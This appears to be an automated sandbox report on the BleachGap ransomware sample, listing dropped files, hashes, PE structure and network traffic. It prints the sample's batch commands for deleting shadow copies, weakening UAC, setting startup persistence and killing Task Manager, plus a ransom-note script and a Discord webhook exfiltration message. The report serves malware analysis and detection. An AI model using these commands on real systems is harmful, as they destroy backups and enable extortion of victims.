Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.A...d.A...d.A..7.d.....d..e...d.....d.A...d.A...d.A...d.Rich..d.........................PE..L...P.1U.................$...................@....@.................................N.....@..................................p..<...............................p...pA...............................k..@............@..0............................text...J#.......$.................. ..`.rdata...7...@...8...(..............@..@.data... g...........`..............@....rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	7154
Entropy (8bit):	5.594207527521222
Encrypted:	false
SSDEEP:	96:kJpc4m7wRQZJHgwamXkzaEF7cEFg93sLIBKA0mFm+mR7rEa7V0rHLp9OG:kJDQZV9kaEFQEFgis07J0PD
MD5:	B4F290130FA9FA7754393FFBB31BED34
SHA1:	411E1620E419056E96BB50C38A22970D3B3DDB68
SHA-256:	1CD216B0BB021977AE3DBB19B9BB88DDAEBDE08BFB1E9A59FAD9BA06F8745FC0
SHA-512:	6F298BCCE4430F194DD793451325C0FF2557BCAAF6C8F5AD8D9F585A4C0201B73C34370BC114315EF94CFAE370EE3635DC8017C87FEFEBC0E51444079E044941
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat, Author: Joe Security
Preview:	@shift /0..@set b2eextd=C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe..@set extd=@call:extd..@set b2etempfile=C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B7.tmp..@echo off..:: BAT/Ransom.BleachGap..:: In five minutes you'll already be crying, after 10 mins you'll trying to drink bleach...setlocal enableextensions enabledelayedexpansion..cd /D %tmp%..copy /b /y %0 "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"..wmic shadowcopy delete..vssadmin delete shadows /all /quiet..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f..REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "000000000000000017000000

C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	264704
Entropy (8bit):	7.995874752462146
Encrypted:	true
SSDEEP:	6144:hxLU+6NdGddlftqxiqx0gwvnGvxvFouHK6yoS:hO+UGdvEpx0fevx+uHSoS
MD5:	38CE85E4580071C40BB204EDFB85A303
SHA1:	EBA80056F4A15FA131478532483B8ABE050C6999
SHA-256:	F0FFDDCF4B507A617D6883889F5167CC6C2D27015EF63AD3E014DB314CD8F465
SHA-512:	0A310A94A418926524E16C15186BA89797B52CDF1EBCDD4F59B79C3963AFDF07EA8EA8E58B23D5126590F3FF0BD2902A6F66D9B05E4B5B481331A97D0B6956FA
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 41%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?SZ...............2......... .. &...0...@....@..........................P...............................................B..8....@..............................................................................................................UPX0..... ..............................UPX1.........0......................@....rsrc........@......................@...3.94.UPX!......^G.K6nN...........&......4.@.O7./..{...qa..+ ....r..JTB...~..W..j..D...HFdM.D...C:....,.....w. ..;!.....t..!C9..<..Y..,n.uq...C..r/.{..H.!.`.`.V~._.Q..i....$S.._.[p..,Cp..t:....G..V3.].x.5..P..,.......1..\.........r~.ozz....a.B..X.c..1.Qj..`h\p..A.......^..b..M......=........Xf.-....H.N.".....T....z....H..I .-...h&P..U.'}..{~R.......F.W.v....-.OC.....g#..}...f...._.@.9....C....M8\|S..f..6v.@...i.d(i..H.../7.Yw.. G.y.M....].?.Yb_.....@Y._+Z.5.......\..j3cD......2...

C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	6.870063375918261
Encrypted:	false
SSDEEP:	24576:WAHnh+eWsN3skA4RV1Hom2KXMmHaWbK76Zu5:xh+ZkldoPK8YaWG+6
MD5:	FB7A78F485EC2586C54D60D293DD5352
SHA1:	D4E1F1061F7A872F9843E44C7D27D13BA7EF71BB
SHA-256:	B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
SHA-512:	B6635E849AB96740E5CEFEF3A874DC58CC26AA18CCC9CCA31E61E541C2DDEADE7EB59E524FC36DF22E0656884733F29D1143FFBF1CDD92FBD636D134D723C3E5
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: SuperEnjoy.exe, Detection: malicious, Browse Filename: InfoSender.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....}._.........."..........2....................@..........................p............@...@.......@.........................\|.......,n......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...,n.......p...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.805779966193588
Encrypted:	false
SSDEEP:	3072:NgzEhDpHGk/gqrYxgHNEt3koN0Shi76u7:NiEhNHgqrLme+i
MD5:	82FF688AA9253B356E5D890FF311B59E
SHA1:	4A143FC08B6A55866403966918026509BEFCC7C1
SHA-256:	B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
SHA-512:	CBB3D81E3237B856E158C5F38F84230A50F913BDADA0EF37B679E27E7DDF3C970173B68D2415DD8A7377BA543206BB8E0FE77C61334B47C5684E3DDFFF86ACED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 21%, Browse Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:	Filename: SuperEnjoy.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.A...d.A...d.A..7.d.....d..e...d.....d.A...d.A...d.A...d.Rich..d.........................PE..L...P.1U.................$...................@....@.................................N.....@..................................p..<...............................p...pA...............................k..@............@..0............................text...J#.......$.................. ..`.rdata...7...@...8...(..............@..@.data... g...........`..............@....rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qazevym2.o50.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfkmenqk.hpo.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\kill.bat Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.401434369208517
Encrypted:	false
SSDEEP:	3:QwLhFKF7JUo9WWrEJfLACy:QUKGo9LrEJf07
MD5:	68B76341006031E4C403E55EAB28ED06
SHA1:	D2713EC3FEB201543681E198F4C49C924641D18A
SHA-256:	B348D1A6B5472B0046E256D82B033C2B3C551B9E493F0B17D88B775A189AFFD6
SHA-512:	2912DE6B8DA3A03CBDB26CC28D1E27DE067CB90E0036BDAA8A003BAE5A8AFBCEDB3C3B9A5FB4FE7676287A9EC63C3815EC4A7D6FFDAC75E7971C651E3CF455E9
Malicious:	false
Preview:	for /l %a in (0,0,1) do taskkill /f /im taskmgr.exe..

C:\Users\user\AppData\Local\Temp\p2d.bat Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	667
Entropy (8bit):	5.240213565414538
Encrypted:	false
SSDEEP:	12:QUbSe1cT1cZW/gH1cT1crM+RyW1cT1cBiKx4HUG1cWFpfZ17:QUbb1k14my1k1ECW1k1PRz1H17
MD5:	027660CFE041100AF7206D189A108643
SHA1:	8E09958F62640BD41011DB9FBE2FDBA6817020E2
SHA-256:	32C9F1D71628E2E6E6E9616F3328BF8C92069C860DB4A0B1DFDF19C9B1E1938D
SHA-512:	B006178E754DA77B5FB24E35219D1E1D92C0A50A0890EB689F3DEC37D7476430D674377D27EC2C9D40AB50627D242BCEDFAF187BF6796A40D3787FC46FBB0769
Malicious:	false
Preview:	for /l %%l in (1,1,100) do (..echo Ooops\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo Pay us 0.0002 BTC to >>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo Your personal key is: a5wQWXI347v6FhSR07HF018llHKk5M2RGHQsTTPFO4Wh>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo You have 5 days to pay, if the time elapse, your files will be deleted.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo The time start now: D:Mon 02/15/2021 T: 0:28:56.12.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..)..start Pay2Decrypt1.txt..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025024
Entropy (8bit):	7.966587831669489
Encrypted:	false
SSDEEP:	24576:gTT3iKmU02uZxgnvmgj0TFxvC4p+jeIMUNxOGOu71:STjXOSjj0TX5weIMcxOYR
MD5:	015BB16DDCBF8A6326EC859020466C05
SHA1:	F0FF1059E64175C8BF3F557CF1B0F49ED105D7D4
SHA-256:	C1EB88CC7F7B43DE1EF71FAE416C729483D71FA930314C36DFB03B01B8455D31
SHA-512:	588051F1702C69B96168C9BFA41BDB9AAFFDF48BF3178E30EE1BF1510989A1B43B1032B9B002F81907428182A050BEFC9B00143B4991C47131BCB4B25DFC83C5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2..................... ....@.........................................................................ta...........Q..........................................................................hd..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3... ...4..................@..@.data...$....`.......@..............@....rsrc....Q.......R...R..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe:Zone.Identifier Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20210215\PowerShell_transcript.305090.J74I2hoI.20210215002833.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3578
Entropy (8bit):	5.282334337658238
Encrypted:	false
SSDEEP:	96:BZwhfNqEtqDo1ZQ/Z6hfNqEtqDo1Z0qXy0kIy0kIy0ktZS:KtUZZQ
MD5:	F409CB15E56F283A2C1B9E7194CFC220
SHA1:	E734478C03EA63B3118CD950EC2FCDA0939D7D07
SHA-256:	EDF35EE42673CD1A001DBBAA90B63669A75F3B4DD786C58DF22AF684FE8B4058
SHA-512:	E93055BF2EF70DFA133DFA8F91E0F200FF98740612DFD4B32370D2F1624520BF1766EB8DB44CA2E625F966EF8BDB2B253143374E6BBB33D817A53C38E1FC4466
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210215002834..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell start -verb runas cmd.exe /ArgumentList /c kill.bat /filepath C:\Users\user\AppData\Local\Temp /WindowStyle hidden..Process ID: 6576..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210215002834..******************..PS>start -verb runas cmd.exe /ArgumentList /c kill.bat /filepath C:\Users\user\AppData\Local\Temp /WindowStyle hidden..******************..Command start time: 20210215002941..********************..PS>TerminatingError(Start-Process): "A po

\Device\ConDrv Download File
Process:	C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	148
Entropy (8bit):	4.554134069706592
Encrypted:	false
SSDEEP:	3:wsAlFp6LBMP4+fkHMBJXXe2A1VRM2I/F1rWAyqk5XB+LBFjAFoLB1:jaULB0fkgZXen1VqH/F1Dyqk5XSzr
MD5:	C42CFB58A85205A662EE6B313D327DC8
SHA1:	DEBAC2BD7400897C1C89F410697DDC5B8F29688D
SHA-256:	24454736FA668455A25BE0FA007095E1ADFE229F0865E2785658D7AF0FE25C22
SHA-512:	32BAB2BD46A4CB3215C104841F04E1677F674F7F96F1DE772CA03820909582CB4836A3E55557DC52C9AA31D265F892CAB4B7C9BD65F9CC52890D1D86B8809091
Malicious:	false
Preview:	[OK] Message sent to WH ending with hE4K [:writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended]..

\Device\Null Download File
Process:	C:\Windows\System32\reg.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.237326145256008
Encrypted:	false
SSDEEP:	3:bqX4LxGT82AGN8cyn:bqX4E8NGN8Rn
MD5:	13015015DD907D28996153DF14881252
SHA1:	532C595BAAE0A027D02D1B28D7B83D57350A310E
SHA-256:	4499283166530CE395CBC12677FEF2BD52759EACDCC5BDDE56C039B1A2E99C0B
SHA-512:	B81FB62AB27E7722BFCB386766FFA1D1EBA05B8B03CD5D2160BB2570F87568381D923AC75017D785E1DEC1685769023727F4280E27C2A69CDE69772CA62E2A92
Malicious:	false
Preview:	The operation completed successfully....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.966587831669489
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	BleachGap.exe
File size:	1025024
MD5:	015bb16ddcbf8a6326ec859020466c05
SHA1:	f0ff1059e64175c8bf3f557cf1b0f49ed105d7d4
SHA256:	c1eb88cc7f7b43de1ef71fae416c729483d71fa930314c36dfb03b01b8455d31
SHA512:	588051f1702c69b96168c9bfa41bdb9aaffdf48bf3178e30ee1bf1510989a1b43b1032b9b002f81907428182a050befc9b00143b4991c47131bcb4b25dfc83c5
SSDEEP:	24576:gTT3iKmU02uZxgnvmgj0TFxvC4p+jeIMUNxOGOu71:STjXOSjj0TX5weIMcxOYR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2..................... ....@........................................................................

File Icon


Icon Hash:	9292b2d4e861cc96

Static PE Info

General
Entrypoint:	0x401000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5A7375F8 [Thu Feb 1 20:18:00 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5877688b4859ffd051f6be3b8e0cd533

Entrypoint Preview

Instruction
push 000000ACh
push 00000000h
push 00417008h
call 00007F0AE080FF21h
add esp, 0Ch
push 00000000h
call 00007F0AE080FF1Ah
mov dword ptr [0041700Ch], eax
push 00000000h
push 00001000h
push 00000000h
call 00007F0AE080FF07h
mov dword ptr [00417008h], eax
call 00007F0AE080FE81h
mov eax, 00416084h
mov dword ptr [0041702Ch], eax
call 00007F0AE0818C42h
call 00007F0AE08189AEh
call 00007F0AE08158A8h
call 00007F0AE081512Ch
call 00007F0AE0814BBFh
call 00007F0AE0814939h
call 00007F0AE081445Dh
call 00007F0AE0813BDDh
call 00007F0AE0810205h
call 00007F0AE0817528h
call 00007F0AE0815FD0h
mov edx, 0041602Ah
lea ecx, dword ptr [00417014h]
call 00007F0AE080FE98h
push FFFFFFF5h
call 00007F0AE080FEA8h
mov dword ptr [00417034h], eax
mov eax, 00000200h
push eax
lea eax, dword ptr [004170B0h]
push eax
xor eax, eax
push eax
push 00000015h
push 00000004h
call 00007F0AE0814B82h
push dword ptr [00417098h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16174	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0xe5188	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16468	0x22c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x37f0	0x3800	False	0.472307477679	data	5.61235572875	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text	0x5000	0xcfa2	0xd000	False	0.513502854567	data	6.58582031604	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x33a0	0x3400	False	0.804612379808	data	7.1102355063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x16000	0x1724	0x1200	False	0.390407986111	data	4.93697688912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0xe5188	0xe5200	False	0.992906735884	data	7.99581044559	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x186e0	0x668	data
RT_ICON	0x18d48	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 286857609, next used block 286888337
RT_ICON	0x19030	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x19158	0xea8	data
RT_ICON	0x1a000	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON	0x1a8a8	0x568	GLS_BINARY_LSB_FIRST
RT_RCDATA	0x1ae10	0x14	zlib compressed data
RT_RCDATA	0x1ae24	0x1a8b	data
RT_RCDATA	0x1c8b0	0xae	data
RT_RCDATA	0x1c960	0x3c	data
RT_RCDATA	0x1c99c	0x1	very short file (no magic)
RT_RCDATA	0x1c9a0	0x74	data
RT_RCDATA	0x1ca14	0x8afef	data
RT_RCDATA	0xa7a04	0x14774	data
RT_RCDATA	0xbc178	0x40a00	data
RT_RCDATA	0xfcb78	0xd	data
RT_GROUP_ICON	0xfcb88	0x5a	data
RT_VERSION	0xfcbe4	0x304	data
RT_MANIFEST	0xfcee8	0x2a0	XML 1.0 document, ASCII text, with very long lines, with no line terminators

Imports

DLL	Import
MSVCRT.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

Version Infos

Description	Data
InternalName	BatFilecoder
FileVersion	1.0
CompanyName	OpenMe
LegalTrademarks	OpenMe Reserved
Comments	Dont Read
ProductName	HowToMake
ProductVersion	1.0
FileDescription	Search on google how to delete me
OriginalFilename	NewRealisticSoftware
Translation	0x0000 0x04e4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2021 00:28:19.619556904 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.666577101 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.667409897 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.679678917 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.726306915 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.726768970 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.726794958 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.726929903 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.740499973 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.788316965 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.788405895 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.873056889 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.873104095 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:19.919040918 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:19.919059038 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:20.069319010 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:20.069355965 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:20.069557905 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:20.069562912 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:20.069586992 CET	443	49724	162.159.135.232	192.168.2.3
Feb 15, 2021 00:28:20.069662094 CET	49724	443	192.168.2.3	162.159.135.232
Feb 15, 2021 00:28:20.985142946 CET	49724	443	192.168.2.3	162.159.135.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2021 00:27:50.516607046 CET	64185	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:50.565500021 CET	53	64185	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:51.361874104 CET	65110	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:51.413913965 CET	53	65110	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:52.348958015 CET	58361	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:52.398101091 CET	53	58361	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:53.837843895 CET	63492	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:53.887896061 CET	53	63492	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:55.130285978 CET	60831	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:55.187108994 CET	53	60831	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:56.508527994 CET	60100	53	192.168.2.3	8.8.8.8
Feb 15, 2021 00:27:56.557359934 CET	53	60100	8.8.8.8	192.168.2.3
Feb 15, 2021 00:27:57.528997898 CET	53195	53	192.168.2.3	8.8.8.8
